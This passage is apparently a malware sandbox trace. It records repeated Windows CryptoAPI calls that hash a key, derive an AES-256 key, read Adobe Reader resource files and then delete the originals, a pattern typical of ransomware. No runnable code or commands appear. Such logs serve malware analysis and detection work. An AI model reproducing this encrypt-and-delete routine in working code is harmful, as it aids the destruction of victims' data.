dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.049] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.049] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e88 [0223.049] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.055] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.055] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.055] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.056] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt")) returned 1 [0223.058] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.058] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.058] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.058] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.058] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e8e [0223.059] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.093] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.093] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.093] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.095] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt")) returned 1 [0223.096] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.096] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.096] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.097] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.097] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x656a [0223.097] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.105] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.105] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.105] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.107] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt")) returned 1 [0223.109] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.109] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.109] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.109] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.109] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x656a [0223.109] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.113] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.113] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.113] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.114] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt")) returned 1 [0223.115] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.116] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.116] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.116] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.116] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6594 [0223.116] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.120] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.120] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.120] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.122] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt")) returned 1 [0223.123] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.124] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.124] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.124] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.124] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x626a [0223.124] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.145] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.145] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.145] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.146] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt")) returned 1 [0223.148] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.148] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.148] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.148] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.148] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x626a [0223.149] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.167] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.167] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.167] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.168] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt")) returned 1 [0223.205] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.206] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.206] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.206] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.206] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6bea [0223.206] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.397] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.397] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.397] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.399] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt")) returned 1 [0223.400] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.400] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.400] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.400] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.401] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6bea [0223.401] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.535] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.535] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.535] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.537] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt")) returned 1 [0223.538] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.539] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.539] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.539] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.539] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6aae [0223.539] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.543] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.543] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.543] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.544] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt")) returned 1 [0223.546] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.546] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.546] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.546] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.546] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6aae [0223.546] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.551] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.551] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.551] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.552] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt")) returned 1 [0223.554] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.554] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.554] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.554] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.554] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6df2 [0223.554] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.565] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.566] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.566] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.567] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt")) returned 1 [0223.568] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.569] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.569] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.569] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.569] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6df2 [0223.569] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.575] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.575] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.575] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.577] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt")) returned 1 [0223.588] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.589] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.589] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.589] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.589] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6dc6 [0223.589] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.641] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.641] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.641] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.642] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt")) returned 1 [0223.644] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.644] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.644] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.644] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.644] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6dd6 [0223.644] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.649] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.649] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.649] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.650] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt")) returned 1 [0223.651] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.652] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.652] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.652] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.652] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6dd6 [0223.652] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.656] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.657] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.657] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.658] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt")) returned 1 [0223.659] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.660] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.660] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.660] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.660] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6dc6 [0223.660] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.694] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.694] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.694] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.695] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt")) returned 1 [0223.696] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.697] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.697] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.697] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.697] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6dd6 [0223.697] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.716] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.716] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.716] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.717] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt")) returned 1 [0223.718] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.719] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.719] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.719] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, 